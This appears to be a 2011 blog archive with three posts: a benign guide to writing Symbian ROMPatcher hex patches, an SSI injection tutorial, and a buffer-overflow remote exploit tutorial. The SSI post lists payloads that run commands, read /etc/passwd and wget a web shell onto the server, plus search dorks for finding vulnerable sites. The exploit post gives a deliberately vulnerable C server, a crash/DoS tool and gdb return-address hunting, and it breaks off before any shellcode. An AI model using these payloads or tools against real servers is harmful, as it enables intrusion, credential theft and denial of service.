Chitika

Wednesday, 28 December 2011

How to make rompatcher patches


Make Rompatcher patches:


I just realized that only a fraction of the patches are available for S^3,
and even those are mostly older ones which were initially made for S60v5.


So I thought of including this guide which I found in another forum (SF).
The original post was made by the author "Microx256" on 03 Jul 2008, 03:20.
I thought this guide might inspire patch making for S^3.


Also, those who wanted to remove the red LED in the camera can try this out:


Contents:


What you need?
How to save Patches as *.rmp
Additional Prefixes
Understanding the HEX
Frequently Asked Questions




Well, you might have found ROMpatcher, and perhaps some good patches for it, but what if you could write your own patches?




What you need?
A HEX editor; I use HxD in this example
A hacked phone with ROMpatcher installed


So, are you ready to begin?


Find out what you want to patch, and where. In my example, I want to change the *#0000# screen to say that I have a Nokia N99.




After looking for the right file to change, I found that it's Phone.exe, because it contains the path of the file we need to change.


First, open the file in a HEX editor (I use HxD in my example).
(For what HEX means, there's a short explanation further down in this post.)






Next, I know that Z:\resource\versions\model.txt is the file that shows the phone model, so I search for it (Ctrl+F); remember to select that we search for text, and that it's in Unicode:






Now we have the result, and can also see it directly as HEX, which will be the first part of the HEX code in the patch file:






At this point, it's recommended to copy the HEX (circled above) to Notepad, or somewhere else from which you can easily copy it again.


Next, I have decided that I want the phone to use Model.txt on the memory card (E:) instead of the Z:\ drive, so I change the first part of the path (note that changed areas turn red); you also notice that the HEX code changed from 5A to 45 where I changed the letter Z to the letter E.






At this point, we are halfway done; good job if you made it this far.


Next we need to write the patch.


The patch should always have the patch name or a short description on the first line, then comments if you want them, and after that the actual patch line. Also, every line except the patch line itself must start with a ;, like in this example:


Code:
    ;Model Text Changer
    ;This is a patch that changes the Model text
    ;here i can add as many lines as i want
    ;this was made by Microx256 from SF
    SnR:sys\bin\Phone.exe:5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400:45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400






Now, where did I get that SnR:... code? Well, you actually already have it.


First, every patch like this should have an SnR: prefix (SnR means Search and Replace).


After the SnR: comes the file that we want to change, in this case Phone.exe. You need to include the path to the file, WITHOUT the Z:\ at the beginning, so in this case it is sys\bin\Phone.exe.
After the path and the file comes a :, then the original, unchanged HEX code that we copied to Notepad earlier; after the original code comes another :, and after that, finally, the changed code, which is still in the hex editor.
Make sure you copy the same amount of code as you did earlier (starting from the code of the Z, which is 5A, to the 00 after the last character in the name).


Code:
    First Part: 5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400
    Second Part: 45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400




And there we have a Patch!




Code:
    ;Model Text Changer
    ;This is a patch that changes the Model text
    ;here i can add as many lines as i want
    ;this was made by Microx256 from SF
    SnR:sys\bin\Phone.exe:5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400:45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400






But wait, we are not finished with this patch just yet!


Now, as we changed Phone.exe to use the file on the memory card instead of the file on Z:\, we need to copy and edit the file.


Copy the file Model.txt from Z:\resource\versions\ to E:\resource\versions\ (you might need to create the folders on the memory card) and edit it as you wish (note: Model.txt has a 20-character limit).


After this, just copy the patch to E:\Patches\ and have fun.








How to save Patches as *.rmp


When you have the code in Notepad, you need to save it, and Notepad saves as .txt by default.
To save it as .rmp, as patches should be, do this:
When saving, select Save as type: All Files (*.*) and manually add the .rmp extension. For example, here I show how it should look if the patch name was uberpatch:








Additional Prefixes:


SnR: is not the only prefix; there are some more, for example the prefix Rel:.


The prefix Rel: works the same way as SnR:, but you define the location as well, so the format of the Rel: prefix is:
Rel:Path\file:location:find:replace
Got confused? Let me explain:


Rel: is just like SnR:, but different.
Path means the same as the path in the SnR: prefix.
file is also the same as in the SnR: prefix.
location is the difference from SnR:; this is the location 0x?? of the change, which I'll explain later.
find is the same as in the SnR: prefix: what to look for in the file.
replace is what to replace the previous with, just like in SnR:.


Well, what's this all for if it has the same effect as SnR:?
- If the file has that same code in multiple places and you want to change just one of them, how would ROMPatcher know which part you want to change? Well, this is the solution to it.


And what does that 0x?? mean, and how do you find it?
Open up a HEX editor; in this example I use HxD:


Again, first decide what to do, and where:


In my example, I have decided to remove the WLAN search bar from the Active Standby of my N95.


And I have found out that the file responsible for this is SnifferAIPlugin.dll, located in Z:\sys\bin\.


And to disable it, I have found out that changing the first and 4th bytes to 00 disables it.


Well, the bytes are 10 and 79, but the thing is that those same bytes appear many, many times in the file, and I want to change only the first ones, so I use the Rel: prefix.


Here are the bytes I'm talking about, in blue:






and in the red circles are the location addresses.
So decide which byte you want to know the location of,
take the number from the left vertical column, and add the number from the top horizontal column to it.
For example, the 4th byte would be 00000003, because on the left there's 00000000


and on top there's 03, and 00000000 + 03 is 00000003.
Another example: on the 5th line, the 7th byte would be 00000046, because on the left there's 00000040 and on the top there's 06.


So the patch that changes those 2 bytes marked in blue would be like this:




Code:
    ;No Wlan in ActiveStandby
    ;This removes the Wlan Search bar from the Active Standby, at least on Nokia N95
    ;to get this to work, first disable ActiveStandby, then apply the patch, and then enable Active Standby again
    ;By Microx256 from Symbian-Freak.com
    rel:sys\bin\SnifferAIPlugin.dll:00000003:10:00
    rel:sys\bin\SnifferAIPlugin.dll:00000000:79:00


Understanding the HEX:




Well, in short, HEX is actually just numbers, almost like the ones we use :wink:


Here you can see how the most common numeric systems go:
Decimal - HEX - Binary
0 0 0
1 1 1
2 2 10
3 3 11
4 4 100
5 5 101
6 6 110
7 7 111
8 8 1000
9 9 1001
10 A 1010
11 B 1011
12 C 1100
13 D 1101
14 E 1110
15 F 1111
16 10 10000
17 11 10001
18 12 10010
19 13 10011
20 14 10100
21 15 10101
22 16 10110
23 17 10111
24 18 11000
25 19 11001
26 1A 11010
27 1B 11011
28 1C 11100
29 1D 11101
30 1E 11110
31 1F 11111
32 20 100000
...


Using this online converter, you can convert any hexadecimal number to decimal and binary, and vice versa.


OK, maybe that's enough for you to see how they go :lol:
So basically, decimals, which we use every day, have 10 digits: 0 1 2 3 4 5 6 7 8 9
HEX has 16 digits: 0 1 2 3 4 5 6 7 8 9 A B C D E F
and finally binary has just 2 digits, 1 and 0 (you don't need to know binary for this tutorial, but it could be useful to know).


So, are all those files just numbers? Then how can there be text, if hex is only numbers?


- Yes, they are numbers, and every letter we use has its own number :wink:
For example, in a HEX editor you can see that the letter A (note: a capital A)


has the HEX value 41,
and hex 41 is 65 in decimal and 1000001 in binary.
For this, you can use the Windows calculator: set it to Scientific from the menus, check the Hex button (or Dec for decimal, or Bin for binary), type a number, and then check another button to convert it.


So, remember this:
- HEX is "numbers", and every letter and special mark has its own number.
- In a HEX editor there are 2 HEX digits after each other, and they form 1 byte; if you convert the 2 hex digits into binary you get 8 binary digits, and 1 binary digit is 1 bit (1 byte = 8 bits). As you might already know, 1 letter takes 1 byte of space, so 2 HEX digits form 1 letter.




Frequently Asked Questions:


How did you know what to look for, and where?
-> Just keep looking inside files, and you might find something interesting to patch; that's how I did it.


My patch doesn't show up in ROMpatcher?
-> Make sure the patch is in E:\Patches\ and that the patch has a .rmp extension.


When I try to apply my patch, I get a red cross as an error. Why?
-> There can be several reasons, but most probably one of these:
*You are trying to patch a file that's not in the ROM (remember, this is ROM Patcher, not Z Patcher)


EDIT:
By "remember, this is ROM Patcher, not Z Patcher"
he means that you can only patch the files in the z:\sys\bin folder of the ROM, not any file in Z:.
If you don't believe this, try to open all these patches in Notepad, and you will see that all of them have only this syntax in the last line:
SnR:sys\bin\xx(filename)xx:A003A005C(hex code):A003A005C(hex code)
EDIT:
A few more words from the author:
"Remember; this is called ROM Patcher, and not Z Patcher, so basically, only files on ROM can be patched.. but for this, there are workarounds, such as patching the file/application that's pointing to the file and so on.. just like in the tutorial, we patched Phone.exe that points to the model file, but we did not patch the model file (Model.txt) itself, because the model file is not in the ROM..."
EDIT: (explanation by nicesoni_ash)
Quote from: nicesoni_ash on 16 August 2011, 07:47
While using ROMpatcher, you must keep in mind that it won't change or edit the contents of the Z drive (or say, of the ROM); it only changes a few bytes of these files while they exist in memory, so once you restart your phone these modifications are gone until you reactivate the same patch again or include it in Auto..






*The syntax of the patch is wrong (original code that doesn't exist)
*The 2 hex codes are not the same length
*The length of the first and second code must be divisible by 2 (e.g. 1337FCA is wrong, because 7 is not divisible by 2, but 1337FCA0 is possible, because 8 is divisible by 2)
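An added example, not part of the original guide, in C (the language of the other code on this page): utf16le_hex() produces the hex that HxD showed for the Unicode search string (each character's byte followed by 00, which is UTF-16LE), and validate_rmp_line() checks one line of a patch against the rules above: an SnR: or Rel: prefix, a path without the Z:\ drive letter, an 8-digit location for Rel:, and find/replace hex of equal, even length. The function names are mine, and accepting the prefix in either case is an assumption based on the guide's own patches, which write both SnR: and rel:.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp: the guide's patches write both "SnR:" and "rel:" */

/* Encode an ASCII string as the uppercase UTF-16LE hex a Unicode search in
 * HxD shows (byte value, then 00). Returns the number of hex digits written,
 * or -1 if out cannot hold 4*strlen(s)+1 bytes. */
int utf16le_hex(const char *s, char *out, size_t outsz)
{
    size_t n = strlen(s);
    if (outsz < n * 4 + 1)
        return -1;
    for (size_t i = 0; i < n; i++)
        sprintf(out + i * 4, "%02X00", (unsigned char)s[i]);
    return (int)(n * 4);
}

static int is_hex(const char *s, size_t len)
{
    if (len == 0)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!isxdigit((unsigned char)s[i]))
            return 0;
    return 1;
}

/* Check one line of an .rmp file. Comment lines (leading ';') always pass.
 * A patch line must be
 *   SnR:path\file:find:replace
 *   Rel:path\file:location:find:replace   (location = 8 hex digits)
 * with the path relative to Z:\ (no drive letter) and find/replace hex of
 * equal, even length. Returns 0 if valid, else -1 with a reason in err. */
int validate_rmp_line(const char *line, char *err, size_t errsz)
{
    const char *f[6], *p = line;
    size_t flen[6], nf = 0, want, fl, rl;
    int is_rel;

    if (line[0] == ';')
        return 0;
    for (;;) {                         /* split on ':' into at most 6 fields */
        const char *q = strchr(p, ':');
        if (nf == 6) {
            snprintf(err, errsz, "too many ':' separated fields");
            return -1;
        }
        f[nf] = p;
        flen[nf] = q ? (size_t)(q - p) : strlen(p);
        nf++;
        if (q == NULL)
            break;
        p = q + 1;
    }
    while (flen[nf - 1] > 0 && (f[nf - 1][flen[nf - 1] - 1] == '\n' ||
                                f[nf - 1][flen[nf - 1] - 1] == '\r'))
        flen[nf - 1]--;                /* ignore a trailing line ending */
    if (flen[0] != 3 || (strncasecmp(f[0], "SnR", 3) != 0 &&
                         strncasecmp(f[0], "Rel", 3) != 0)) {
        snprintf(err, errsz, "unknown prefix (expected SnR: or Rel:)");
        return -1;
    }
    is_rel = strncasecmp(f[0], "Rel", 3) == 0;
    /* "Z:\sys\bin\..." splits into a one-letter field before its ':' */
    if (nf > 1 && flen[1] == 1 && isalpha((unsigned char)f[1][0])) {
        snprintf(err, errsz, "path must be relative to Z:\\ (no drive letter)");
        return -1;
    }
    want = is_rel ? 5 : 4;
    if (nf != want) {
        snprintf(err, errsz, "expected %zu fields, got %zu", want, nf);
        return -1;
    }
    if (flen[1] == 0) {
        snprintf(err, errsz, "empty file path");
        return -1;
    }
    if (is_rel && !(flen[2] == 8 && is_hex(f[2], 8))) {
        snprintf(err, errsz, "location must be 8 hex digits, e.g. 00000003");
        return -1;
    }
    fl = flen[nf - 2];
    rl = flen[nf - 1];
    if (!is_hex(f[nf - 2], fl) || !is_hex(f[nf - 1], rl)) {
        snprintf(err, errsz, "find/replace must be hex digits only");
        return -1;
    }
    if (fl != rl) {
        snprintf(err, errsz, "find has %zu hex digits but replace has %zu", fl, rl);
        return -1;
    }
    if (fl % 2 != 0) {
        snprintf(err, errsz, "%zu hex digits is not a whole number of bytes", fl);
        return -1;
    }
    return 0;
}
```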


How can I know which files are on the ROM and which are not?
-> Use this ROM Dump tool (by Zorn) to get the ROM files extracted to your computer.


I did as you did in that example, but the Model line disappeared from the *#0000# display?
-> Make sure the patch syntax is correct, and also make sure you have your Model.txt in the right directory on the memory card.


Can patches be harmful to my phone?
-> Not really, because the patches don't actually change anything, and all changes are reset after you restart your phone. However, if something happens, neither I nor Symbian-Freak.com are responsible for any possible harm caused.


Can I patch many files in 1 patch?
-> Yes you can; here's an example patch that changes 2 files in 1 patch:


Code:
    ;all info mod
    ;this mod lets you change the whole *#0000# screen
    ;make files E:\resource\versions\sw.txt and E:\resource\versions\model.txt on the memory card
    ;then customize them as you want
    ;there is a 64 character limit for sw.txt, which is displayed first
    ;and a 20 character limit for model.txt, which is displayed after sw.txt
    ;use \n for a new line; note that the new line uses 2 characters, and there doesn't need to be a space before or after the marks
    ;also note that model.txt will be displayed right after sw.txt without a new line, unless you define it so
    ;and you can use the new line marking \n only in sw.txt, it won't work in model.txt
    ;combined mod by Microx256 from SF
    SnR:sys\bin\sysutil.dll
    SnR:sys\bin\Phone.exe:5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400:45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400








If you have questions, please ask them here and don't PM me, as I am not the author of this thread;
I just decided to share this so that users like you can go ahead and experiment with making patches.




IMPORTANT:


How to open the ROM drive?
Two methods:
1. Extract the ROM drive (open rofs2 in Nokia Cooker or any program and extract it)


2. Else you can use ROM Dump in ROMpatcher Plus


How to do this:
Go to ROMpatcher and under Options click on ROM Dump.
You will get a file in the root of your SD card.
Copy this file onto your PC.
Then use CODeRUS RomATv1.8 to extract its contents [RomATv1.8 download here]
The application executable is packed by a corporate packer, so antiviruses may report it as a threat. Add the executable as an exception!
So don't post about this being virus infected and all that; it isn't a virus designed to screw your PC.


There is also an option for Superpage Dump;
it will also produce a similar file which can be extracted later.

Thanks to jnx_r for this awesome tut :)

Monday, 12 December 2011

server side inclusion


Server Side Includes


What is It?


A Server Side Include attack is an extremely useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know which commands could help compromise the server.


What Sites are Vulnerable?


For a site to be vulnerable to SSI injection, Apache needs Server Side Includes allowed in the config file, or the file extension must end in '.shtml', '.shtm' or '.stm'. Apache, lighttpd and IIS all support SSI.
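As an added example that is not part of the original post, here are the Apache directives that decide whether an injected #exec can run at all. The first fragment is the permissive setup the text describes; the second keeps SSI off by default and, where a directory needs it, uses IncludesNOEXEC so #exec is refused. The directory paths are assumptions.

```apache
# Permissive: every .shtml under the document root is parsed for SSI, and an
# injected <!--#exec cmd="..." --> runs as the web server user.
<Directory "/var/www/html">
    Options +Includes
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</Directory>

# Hardened: SSI disabled site-wide, enabled only for the one directory that
# needs it, and IncludesNOEXEC forbids #exec (and #include of CGI output).
<Directory "/var/www/html">
    Options -Includes
</Directory>
<Directory "/var/www/html/templates">
    Options +IncludesNOEXEC
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</Directory>
```

IncludesNOEXEC still lets #include virtual pull in static files, so user input must never reach an SSI-parsed page unencoded even with the hardened setting.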


Testing for SSI Injection


To audit a site to check if it is vulnerable to SSI injection, you search all the directories for '.shtml', '.shtm' or '.stm' extensions; if you find any, then it's probably enabled, and if you don't find any it still may be enabled. It affects pages with unsanitized requests (e.g. no filters filtering <!--#exec ... -->). To test, you enter the following command into the request:


<!--#exec cmd="ls" -->


If you get a filesystem listing, then it is vulnerable; if the server is Windows, replace 'ls' with 'dir'.
You test for SSI the same way as for XSS: you can post the command into


- Textboxes/search boxes
- Headers
- Cookies
- Address Bar


Useful Commands


Show Files Linux


<!--#exec cmd="ls" -->


Show Files Windows


<!--#exec cmd="dir" -->


Read /etc/passwd


<!--#include virtual="/etc/passwd" -->


What user is the web server running as


<!--#exec cmd="whoami" -->


Download a shell to the server to get full control


<!--#exec cmd="wget shell.php" -->


Dorks


Similar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI injection:


inurl:index.shtml
inurl:index.shtm
inurl:index.stm


There are many others, but you can just use your imagination.


Hope you liked this tutorial.


how to write remote exploit



I hope you'll enjoy it. OK, what are we going to do? We want to exploit a vulnerable server program (vulnerable.c) and get a remote shell. In case you are looking for an exercise, read the vulnerable.c program, compile it and try to exploit it. If you don't have any clue about remote exploits, well, then read further. Let us first take a look at the vulnerable program; later we want to look at the functions of the vulnerable program, then at how we can abuse an overflow within the program, then define the general structure of the exploit code, and at last write an exploit.



-------------------------------------------- vulnerable.c ----------------------------------------------

#include <stdio.h>
#include <stdlib.h>       /* atol */
#include <string.h>       /* strcpy, strlen */
#include <unistd.h>       /* close */
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_ntoa */

#define BUFFER_SIZE 1024
#define NAME_SIZE 2048

int handling(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    int bytes;

    strcpy(buffer, "My name is: ");
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;
    bytes = recv(c, name, sizeof(name), 0);
    if (bytes <= 0)       /* 0 bytes (peer closed) would otherwise index name[-1] */
        return -1;
    name[bytes - 1] = '\0';
    /* The bug: name holds up to 2048 bytes, buffer only 1024, and sprintf()
     * never checks the destination size. */
    sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;
    return 0;
}

int main(int argc, char *argv[])
{
    int s, c;
    socklen_t cli_size;
    struct sockaddr_in srv, cli;

    if (argc != 2)
    {
        fprintf(stderr, "usage: %s port\n", argv[0]);
        return 1;
    }
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        perror("socket() failed");
        return 2;
    }
    srv.sin_addr.s_addr = INADDR_ANY;
    srv.sin_port = htons((unsigned short int) atol(argv[1]));
    srv.sin_family = AF_INET;
    if (bind(s, (struct sockaddr *) &srv, sizeof(srv)) == -1)
    {
        perror("bind() failed");
        return 3;
    }
    if (listen(s, 3) == -1)
    {
        perror("listen() failed");
        return 4;
    }
    for (;;)
    {
        cli_size = sizeof(cli);   /* accept() needs the size of the address buffer on entry */
        c = accept(s, (struct sockaddr *) &cli, &cli_size);
        if (c == -1)
        {
            perror("accept() failed");
            return 5;
        }
        printf("client from %s", inet_ntoa(cli.sin_addr));
        if (handling(c) == -1)
            fprintf(stderr, "%s: handling() failed", argv[0]);
        close(c);
    }
    return 0;
}

---------------------------------------------- EOF------------------------------------------------------

Here’s how you must compile and use the program.

user@linux:~/ > gcc vulnerable.c -o vulnerable

user@linux:~/ > ./vulnerable 8080

./vulnerable 8080 means that you run the service on port 8080. Pick the port you want to take, but you mustn't use a privileged port (1-1024) assuming you are not root.

Now we've compiled the program and we know how to run it, with the parameter

program <port>

Now we want to check some addresses of the program and take a look at how it is built. We start the vulnerable program with gdb to look at some things.





now do the following:

user@linux~/ > gdb vulnerable
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...
(gdb) run 8080
Starting program: /home/user/directory/vulnerable 8080

Now the program is listening for an incoming connection on port 8080.

Next connect with telnet or netcat on port 8080.

user@linux:~/ > telnet localhost 8080
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
My name is: Robin
, nice to meet you!
Connection closed by foreign host.
user@linux:~/ >

Now, this simple server program doesn't do anything else than get a name and write it back to your screen. OK, let's go further.

While you did this, gdb (the debugger) wrote the following on the screen:

client from 127.0.0.1 0xbffff28c

/* Don't be confused if the address is different on your computer; on my box it is 0xbffff28c */

OK, the server is still running because of the for loop, so it keeps repeating until you kill the server program.

3. Overflowing the server program

Let's test something....

Now we reconnect to the service on port 8080 and enter more than 1024 bytes of characters at the "My name is:" prompt.

It should look like this (I'll take A's *g*):

user@linux:~/ > telnet localhost 8080
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now the telnet client should be disconnected. But why? Let's look at the output of gdb:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

// Don't close gdb!

What happened? As we can see, EIP is set to 0x41414141; probably you are asking why?

OK, I'll try to explain it. 0x41 stands for an 'A'. As we put over 1024 bytes in, the program tried to copy the string name[2048] into buffer[1024]. Because the string in name[2048] was greater than 1024 bytes, the name string overflowed buffer and also overwrote the saved EIP (extended instruction pointer; this is where the return address is stored). So our buffer looks like this:

[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]

[xxxxx buffer-only-1024-bytes xxx] [EIP]

OK, our stack should look like this. We've tried to put more than 1024 bytes into buffer, and so we've overwritten EIP *g*.

// don't forget: EIP has a size of 4 bytes!

After you overwrote the whole return address, when the function wanted to return to main it jumped to the wrong address (0x41414141), and so there was a segmentation fault.
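The fix for the overflow just described, as an added example that is not part of the original tutorial: handling() rewritten so that no copy is ever larger than its destination. format_greeting() is kept free of socket calls so it can be exercised with a 2048-byte name; the names format_greeting, trim_line_ending and handling_hardened are mine.

```c
/* Hardened rewrite of handling() from vulnerable.c (added example, not the
 * tutorial's code). The original defect is the unbounded sprintf() of a
 * 2048-byte name into a 1024-byte buffer; here every copy is bounded by the
 * destination size, and an over-long name is rejected instead of being
 * written partially. */
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#define BUFFER_SIZE 1024
#define NAME_SIZE   2048

/* Build "Hello <name>, nice to meet you!\r\n" into out (capacity outsz).
 * name is a counted byte string straight from recv(), so it is copied by
 * length with memcpy(), never with strcpy()/sprintf("%s"). Returns the
 * number of bytes written (excluding the NUL), or -1 if the greeting would
 * not fit, so the caller can answer with an error instead of overflowing. */
int format_greeting(char *out, size_t outsz, const char *name, size_t namelen)
{
    static const char prefix[] = "Hello ";
    static const char suffix[] = ", nice to meet you!\r\n";
    size_t need = (sizeof(prefix) - 1) + namelen + (sizeof(suffix) - 1);

    if (out == NULL || outsz == 0)
        return -1;
    if (need + 1 > outsz)            /* +1 for the terminating NUL */
        return -1;
    memcpy(out, prefix, sizeof(prefix) - 1);
    memcpy(out + sizeof(prefix) - 1, name, namelen);
    memcpy(out + sizeof(prefix) - 1 + namelen, suffix, sizeof(suffix) - 1);
    out[need] = '\0';
    return (int)need;
}

/* Drop the trailing "\r\n" (or "\n") telnet sends and return the new length;
 * the original did this with name[bytes - 1] = '\0', which breaks on 0 bytes. */
size_t trim_line_ending(const char *name, size_t len)
{
    while (len > 0 && (name[len - 1] == '\n' || name[len - 1] == '\r'))
        len--;
    return len;
}

/* Same protocol as the tutorial's handling(): prompt, read a name, greet. */
int handling_hardened(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    ssize_t bytes;
    int len;

    bytes = send(c, "My name is: ", 12, 0);
    if (bytes == -1)
        return -1;
    bytes = recv(c, name, sizeof(name), 0);   /* bounded by the array size */
    if (bytes <= 0)
        return -1;
    len = format_greeting(buffer, sizeof(buffer), name,
                          trim_line_ending(name, (size_t)bytes));
    if (len < 0) {
        static const char msg[] = "Name too long.\r\n";
        send(c, msg, sizeof(msg) - 1, 0);
        return -1;
    }
    bytes = send(c, buffer, (size_t)len, 0);
    return bytes == -1 ? -1 : 0;
}
```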

Now here's a DoS tool for this program:

------------------------------------- dos.c ------------------------------------------------------------

#include <stdio.h>
#include <stdlib.h>       /* exit, atol */
#include <string.h>
#include <unistd.h>       /* close */
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

int main(int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *host;
    char buffer[2048];
    int s, i;

    if (argc != 3)
    {
        fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);
        exit(0);
    }
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        perror("socket() failed");
        exit(0);
    }
    host = gethostbyname(argv[1]);
    if (host == NULL)
    {
        herror("gethostbyname() failed");
        exit(0);
    }
    addr.sin_addr = *(struct in_addr *) host->h_addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(atol(argv[2]));

    if (connect(s, (struct sockaddr *) &addr, sizeof(addr)) == -1)
    {
        perror("couldn't connect to server");
        exit(0);
    }
    /* Not difficult: only filling the buffer with A's, then sending nothing more.
     * The buffer has no terminating NUL, so it is sent by its size, not strlen(). */
    for (i = 0; i < 2048; i++)
        buffer[i] = 'A';
    printf("buffer filled... now sending buffer\n");
    send(s, buffer, sizeof(buffer), 0);
    printf("buffer sent.\n");
    close(s);
    return 0;
}

--------------------------------------------- EOF ------------------------------------------------------











4. Finding the return address



I only want to show you what the structure of a remote exploit looks like, so let's find out what we are going to do:

First we open gdb and search for the ESP. To find the ESP, after getting the SEGFAULT type this in gdb (I hope you didn't close gdb): x/200bx $esp-200. You should get an output of addresses; it should look like this:

(gdb) x/200bx $esp-200
0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
---Type <return> to continue, or q <return> to quit---

OK, now we know that we've overwritten the whole buffer, so let's take one of those addresses. I'll show you later why (because we want to guess the address). Maybe you know the NOP technique; with it, it shouldn't be any problem to make our exploit work as well, or at least to make our chance of guessing the return address bigger.

Attention: don't take the address nearest the end of the 0x41s; take an address which is in the middle, as we'll overwrite it later with NOPs.



5. Structure of the exploit code

So we've got a possible return address; let's try to use it. The exploit code should be structured like this:

